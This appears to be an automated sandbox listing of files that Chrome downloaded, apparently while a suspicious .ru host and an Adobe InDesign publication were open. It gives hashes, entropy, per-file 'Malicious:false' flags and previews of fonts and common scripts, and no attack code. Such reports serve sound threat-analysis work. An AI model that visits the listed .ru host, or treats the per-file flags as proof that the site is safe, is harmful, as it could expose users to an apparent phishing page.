                                                                                                                                                                                                                                                                                                              SHA1:269C8CF4A22D816786C3952F637B37450B074638
                                                                                                                                                                                                                                                                                                              SHA-256:5E5D6AA276106C0C499EC55976D7E70C69F443BFD94D2778543E37C044FEB99C
                                                                                                                                                                                                                                                                                                              SHA-512:30CBDD46E130DEF6DDC13461DCF23B125153A4C8DD827C74FA34EA7375497D03875F2C748EB8F55319DCDD410324679F9811F9528208CE098093B2FC062A884D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............\u......pHYs...........~... .IDATx^..{X...7.!1.Bb.SD...Z.)k..SVw+v..V.=.............^nk.a]E.>..R.fq}D..O...N.U.X. . &..L...1.r./...y...KM.......=}~.Z[[ADDD.K*...z..fv+..o...H.kDt..$."#.a..=..Q.$b....(...DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD....DDD1.aMDD..b.(.*...b]...U..uu......+.......d.7*.i..s....#".....V.6....8.*.....8........P..?...O~........D.....Pd0....Sxz.^......bl6.KM...?.iw.!..(\..Q.....j...?.P..tG6........1{.D....Q....%G..?.7.;.......b-..z.a.%...q8.X.c'..;.....0..(..2..DD=....u.8...h.....sc....T*.Z....a.%.....W...&.f.3N.c`.Q$0...EQ.l.7....p....6o.kFDD...:.v..A....f..V..d.v...kIDD...:L.-.<...o..Q...."T[,b-..(.1......k.....kBDD1.a....j|[.bP...T\..kFDD1.a.........H.F....""....j...r.....&"....t..>.].+......""........bM.O.....[.....(.X..LXX...u....W_...`U3".~h@...+M8.. .[W.V._...6.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):28000
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99335735457429
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                                                                                                                                                                                                                                                                              MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                                                                                                                                                                                                                                              SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                                                                                                                                                                                                                                              SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                                                                                                                                                                                                                                              SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-bold.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):93276
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.997636438159837
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                                                                                                                                                                                                                                                              MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                                                                                                                                                                                              SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                                                                                                                                                                                              SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                                                                                                                                                                                              SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://yxmaiypmfuyt.holdbitco.ru/web5/assets/fonts/GDSherpa-vf2.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (30828)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):31235
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.251753387282055
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:puAlXTTsfSKsMoqSeUDbn4zSfZcwEb6rk27Cg7:HlX3sfSHdfyw/rP
                                                                                                                                                                                                                                                                                                              MD5:54928748CDD22675EDA428F74AB5F0D9
                                                                                                                                                                                                                                                                                                              SHA1:4F9C92E8090A284264C003B637AD5AF65CDC606A
                                                                                                                                                                                                                                                                                                              SHA-256:D10423757BA6F91E188A9A049DC11B071A218BA7E49EE3C5940F8B0B6F16B064
                                                                                                                                                                                                                                                                                                              SHA-512:1AC703215F950CD974B1DCC3CCD4F8CAF9C4C434803C60E095176E059AD19BE394B7238E3109E14CDD23BB1F37297A49B431C9A14D094D5F50899C72749862D8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/newrelic_browser/newrelic.js
                                                                                                                                                                                                                                                                                                              Preview:;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam-cell.nr-data.net"]}};.window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var o=e[n]={exports:{}};t[n][0].call(o.exports,function(e){var o=t[n][1][e];return r(o||e)},o,o.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<n.length;o++)r(n[o]);return r}({1:[function(t,e,n){function r(t){try{s.console&&console.log(t)}catch(e){}}var o,i=t("ee"),a=t(32),s={};try{o=localStorage.getItem("__nr_flags").split(","),console&&"function"==typeof console.log&&(s.console=!0,o.indexOf("dev")!==-1&&(s.dev=!0),o.indexOf("nr_dev")!==-1&&(s.nrDev=!0))}catch(c){}s.nrDev&&i.on("internal-error",function(t){r(t.stack)}),s.dev&&i.on("fn-err",function(t,e,n){r(n.stack)}),s.dev&&(r("NR AGENT IN DEVELOPMENT MODE"),r("flags: "+a(s,function(t,e){return t}).join(", ")))},{}],2:[function(t,e,n){function r(t,e,n,r,s){try{l?
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1957)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3093
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.583691231798128
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:/p+y/clUyAQHWs5+TaorOFzyHOgeEh7z5jFqxv4tk5YHIeklwgz0DuExjGx:B+5AQHAray48f5JMYHIqgIDu9
                                                                                                                                                                                                                                                                                                              MD5:71515572FA5E78428F5568D43DAB629B
                                                                                                                                                                                                                                                                                                              SHA1:204DD79C7FBAADFFD1F8B6A9BE138E0AFD23244A
                                                                                                                                                                                                                                                                                                              SHA-256:C4D772A0385B9CBA0B69E4255319D3994159C1CBFC27E3EB05898352A3BDB4EE
                                                                                                                                                                                                                                                                                                              SHA-512:B36F6E914267EADBA7E1EC8C7870AC1BF5BA9C012620B30730CD485B35D71223620AA4A2F34B9F912B9455BCC38962DB2CD63499B159E1885CCCB3999AD2A1D9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://connect.facebook.net/en_US/sdk.js
                                                                                                                                                                                                                                                                                                              Preview:/*1698250877,,JIT Construction: v1009470316,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (516)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3324
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.22776591853865
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:35Y2zQVnKrK+9GL+VGZ+CGbMyFG3tGf6GGMb6GYGDGkM8GdGMGxMbn:pbzQy7PXpMfMZMCMz
                                                                                                                                                                                                                                                                                                              MD5:43F98D046D99AEA5B64D044C158B89B7
                                                                                                                                                                                                                                                                                                              SHA1:8B4A8D5070AE43E5F3641CFF1E05517425CDDB6E
                                                                                                                                                                                                                                                                                                              SHA-256:0083A9841D1C09783337064894DB08FE29EC449AF14797007C098A196021DB9E
                                                                                                                                                                                                                                                                                                              SHA-512:38EEDDA6E67594012F8803FF0E217BDFD952D5F9508B1A65438F88D69DE1C61074525CACD2F667244FB943F979E511B33BED2EB1D52EA295A88E9EDE094CC116
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://use.typekit.net/urt5zuu.css
                                                                                                                                                                                                                                                                                                              Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * adobe-clean:. * - http://typekit.com/eulas/00000000000000007735dac8. * - http://typekit.com/eulas/00000000000000007735dacd. * - http://typekit.com/eulas/00000000000000007735dad8. * - http://typekit.com/eulas/00000000000000007735dada. *. * . 2009-2023 Adobe Systems Incorporated. All Rights Reserved.. */./*{"last_published":"2022-04-19 07:03:14 UTC"}*/..@import url("https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css");..@font-face {.font-family:"adobe-clean";.src:url("https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n4&v=3") format("woff2"),url("https://use.typekit.net/af/c0160f/00000000000000
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):24838
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.3123936816251356
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Fa0lD3+NH5Y6NPPz6goZXoSSMe2MZrkSylpN87wxov:RSUKEMlkNlpXCv
                                                                                                                                                                                                                                                                                                              MD5:9A7C6A64C52EAA1DC6FC290A935A2D01
                                                                                                                                                                                                                                                                                                              SHA1:BE06BE319FBC8876D68ED312BAE68907C897F546
                                                                                                                                                                                                                                                                                                              SHA-256:38CA62FCB1EFFC07AB4128F21883D112F2426B9EBC1B913A05FE759C3E0B6A9F
                                                                                                                                                                                                                                                                                                              SHA-512:73C929DE2CF7FBDB88F564F567D83688BBAA860B6A21D8E97201D609B0A0C1F21B30A966FD097C60C806350B91D1FF425E2091155FBD157AEF659D20CB257B7E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/1_b50c358/public/build/resources/favicon.ico
                                                                                                                                                                                                                                                                                                              Preview:......@@.... .(B..F... .... .....nB........ ......S........ .h....\..(...@......... ............................................................................................................................................................................. .................................... ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>1..........................................................................................................MA............................................................................................................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):5
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.5219280948873621
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:U8n:U8n
                                                                                                                                                                                                                                                                                                              MD5:83D24D4B43CC7EEF2B61E66C95F3D158
                                                                                                                                                                                                                                                                                                              SHA1:F0CAFC285EE23BB6C28C5166F305493C4331C84D
                                                                                                                                                                                                                                                                                                              SHA-256:1C0FF118A4290C99F39C90ABB38703A866E47251B23CCA20266C69C812CCAFEB
                                                                                                                                                                                                                                                                                                              SHA-512:E6E84563D3A55767F8E5F36C4E217A0768120D6E15CE4D01AA63D36AF7EC8D20B600CE96DCC56DE91EC7E55E83A8267BADDD68B61447069B82ABDB2E92C6ACB6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css
                                                                                                                                                                                                                                                                                                              Preview:/**/.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (32086)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):166260
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.385453947209825
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:vNMyqhJvN32cBC7M6Whca98HrAjwggKYDdRgfZgAqFFHcw:vq17hbvca98HrkgKYDdRgf2AqFRT
                                                                                                                                                                                                                                                                                                              MD5:CDBBA438DE2BC634AAE56C88923499BE
                                                                                                                                                                                                                                                                                                              SHA1:9F0E60E5FB31F2D6B42B6B03122F27D48DFB0C48
                                                                                                                                                                                                                                                                                                              SHA-256:648FFB26397E4620CD491C3A9B9F469B1F21B874E45E46F2B1B721BA2CBC3670
                                                                                                                                                                                                                                                                                                              SHA-512:2C6B1ADC11B08DD03246A862D043D18AF5CC3A5743CE9D304D1249016B753EABCB20CFAE30922EDDDB53F8D825F8088F6DCA3E2CFAFB50DFB28AA49DDAAF93D7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:"https://indd.adobe.com/1_b50c358/public/build/contentHandler/contentHandler.html?basepath=https://indd.adobe.com&relativepath=/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.html&parentorigin=https://indd.adobe.com&maxPageDimensions={%22width%22:612,%22height%22:792}&transition=false"
                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EDGE"><meta charset="utf-8"><link rel="stylesheet" type="text/css" href="contentHandler.min.css"><script>/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3172), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3172
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853184971105934
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0fNOEByffNzfoByVKtB3fNSKtBNJAhThSRc05s:0f0EwfflfowCBfdbSXl05s
                                                                                                                                                                                                                                                                                                              MD5:3B86DD5DF78EC4E994904E6BDADFEF6A
                                                                                                                                                                                                                                                                                                              SHA1:AFC34A3210A6A034CDFEE3F975206773F5B644CC
                                                                                                                                                                                                                                                                                                              SHA-256:A059B35680FFAD5B6CB4DA08329BBA36D82DB37CBD370160A7CC86DDE40663B4
                                                                                                                                                                                                                                                                                                              SHA-512:339A11B61E89E4F715E4445A23F375C738143396B2EB117D100ECD3CEDDAEC92F40125B1A99C621AF2BFA97061EE6C5D540205FAA72ACCA0674431C6AFF31055
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/1_b50c358/public/build/contentHandler/contentHandler.min.css
                                                                                                                                                                                                                                                                                                              Preview:.flyInFromRightAnimation{-webkit-animation-delay:0s;-webkit-animation-duration:1s;-webkit-animation-fill-mode:forwards;-webkit-animation-iteration-count:1;-webkit-animation-name:flyInFromRightKeyFrames;-webkit-animation-timing-function:ease;-webkit-transform-origin:0 0;animation-delay:0s;animation-duration:1s;animation-fill-mode:forwards;animation-iteration-count:1;animation-name:flyInFromRightKeyFrames;animation-timing-function:ease;transform-origin:0 0}.flyInFromLeftAnimation,.flyOutRightAnimation{-webkit-animation-delay:0s;-webkit-animation-duration:1s;-webkit-animation-fill-mode:forwards;-webkit-animation-iteration-count:1;-webkit-animation-timing-function:ease}.flyInFromLeftAnimation{-webkit-animation-name:flyInFromLeftKeyFrames;-webkit-transform-origin:0 0;animation-delay:0s;animation-duration:1s;animation-fill-mode:forwards;animation-iteration-count:1;animation-name:flyInFromLeftKeyFrames;animation-timing-function:ease;transform-origin:0 0}@-webkit-keyframes flyOutRightKeyFrames
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65400), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):779238
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.057744094261514
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:IvxDgoR8U+rW49AThEUQgWh/YQKCnhAq5M9qLJUlY:sxDgoWh/YfwJUlY
                                                                                                                                                                                                                                                                                                              MD5:AE5023D90D41331028104855C5D454C9
                                                                                                                                                                                                                                                                                                              SHA1:51A8F41EDA20ED85FBB658345D28B6FEC5CB5132
                                                                                                                                                                                                                                                                                                              SHA-256:43305EEB46461A0484E628B85CBA0946149D96E0064A439F3B8AC0036D7DAC76
                                                                                                                                                                                                                                                                                                              SHA-512:28CAC70759080558D5AF1A199A2DE602E77E134627CC3C30BBACC8C6090BBFBD501688B56AE84E1AEF43FB0B7CF85894CE5517CFA6D1E970C0D77BF2B67BA223
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://indd.adobe.com/1_b50c358/public/build/static/css/main.6f589814.css
                                                                                                                                                                                                                                                                                                              Preview:*,:after,:before{border:0 solid #e5e7eb;box-sizing:border-box}:after,:before{--tw-content:""}html{-webkit-text-size-adjust:100%;font-family:var(--spectrum-alias-body-text-font-family);line-height:1.5;tab-size:4}body{line-height:inherit;margin:0}hr{border-top-width:1px;color:inherit;height:0}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:initial}sub{bottom:-.25em}sup{top:-.5em}table{border-collapse:collapse;border-color:inherit;text-indent:0}button,input,optgroup,select,textarea{color:inherit;font-family:inherit;font-size:100%;line-height:inherit;margin:0;padding:0}button,select{text-transform:none}[ty
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 45 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.035372245524405
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlWrtathsyxl/k4E08up:6v/lhP/t/7Tp
                                                                                                                                                                                                                                                                                                              MD5:491C46ED02E18320C3E248357537D1B9
                                                                                                                                                                                                                                                                                                              SHA1:D15CA58277299B5D8D7BBECBC2B2289C4B5E623A
                                                                                                                                                                                                                                                                                                              SHA-256:968334FB2A6780B66CEAA0858D16E7F9886C46DA328FF1E904D03CC9EFDAE312
                                                                                                                                                                                                                                                                                                              SHA-512:DD51E0011A9D16F135E68168CAA8A2AEA1786A4AAE759A4D95248AC7572739F41B60883222DF6939FF2481DE73314CC8AE5E10BBCEB063DE4138A02D8704A244
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...-...`.......l.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4035
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.967262459358591
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:LdhU6GvUPMjxG1/NPAmglR+pdQIQTFR4R2SJy0Hco5N1/stNMr8X2X5k:JeAPkxG1V4mARQQnZR4R2i5N1Mu8mu
                                                                                                                                                                                                                                                                                                              MD5:D3C231A69CE52D5D98890ED3C18F4A79
                                                                                                                                                                                                                                                                                                              SHA1:08C856EF9C3B66B7F5562D2A8AC8F928381F9394
                                                                                                                                                                                                                                                                                                              SHA-256:893772A9C95227FCE12DCA1EA2C0045D2A1E8D77A7A32347F42B0F25549B1AC1
                                                                                                                                                                                                                                                                                                              SHA-512:920C3823B2CF4EEA30FAC15B94547A4058D6F9516AAA04C4824D56880F3531914A5EA516D5C842D65E98AAD7B2D79C02533331DDD59E370A5C429725908F94D5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              URL:https://assets.adobedtm.com/659ec8ada5450db95675e43beaaae92399591a11/s-code-contents-8c13644f711b07d7267ee6b267351ed40b772da3.js
                                                                                                                                                                                                                                                                                                              Preview:/************************** Global Config *************************************/.var namespace = 'adobecorp';.var sObjectName = 's_adbadobelastmile';.// so that the variable s_adbadobenonacdc is set globally on IE8 and below.var s_adbadobelastmile;./************************** Global Config End *********************************/../************************** VisitorAPI.js Config ******************************/.//var visitor = new Visitor(namespace); // not yet....//visitor.trackingServer = 'stats.adobe.com'; // not yet....//visitor.trackingServerSecure = 'sstats.adobe.com'; // not yet..../************************** VisitorAPI.js Config End **************************/../************************** AppMeasurement.js Config **************************/.window[sObjectName] = new AppMeasurement();.window[sObjectName].account = _satellite._getAdobeAnalyticsAccount(sObjectName);..//--------------------- Visitor Config -----------------------------------------.//window[sObjectName].visitorNamespac
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):24838
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.3123936816251356
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Fa0lD3+NH5Y6NPPz6goZXoSSMe2MZrkSylpN87wxov:RSUKEMlkNlpXCv
                                                                                                                                                                                                                                                                                                              MD5:9A7C6A64C52EAA1DC6FC290A935A2D01
                                                                                                                                                                                                                                                                                                              SHA1:BE06BE319FBC8876D68ED312BAE68907C897F546
                                                                                                                                                                                                                                                                                                              SHA-256:38CA62FCB1EFFC07AB4128F21883D112F2426B9EBC1B913A05FE759C3E0B6A9F
                                                                                                                                                                                                                                                                                                              SHA-512:73C929DE2CF7FBDB88F564F567D83688BBAA860B6A21D8E97201D609B0A0C1F21B30A966FD097C60C806350B91D1FF425E2091155FBD157AEF659D20CB257B7E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:......@@.... .(B..F... .... .....nB........ ......S........ .h....\..(...@......... ............................................................................................................................................................................. .................................... ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>1..........................................................................................................MA............................................................................................................................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7334), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7334
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7953577005553
                                                                                                                                                                                                                                                                                                              Encrypted:false
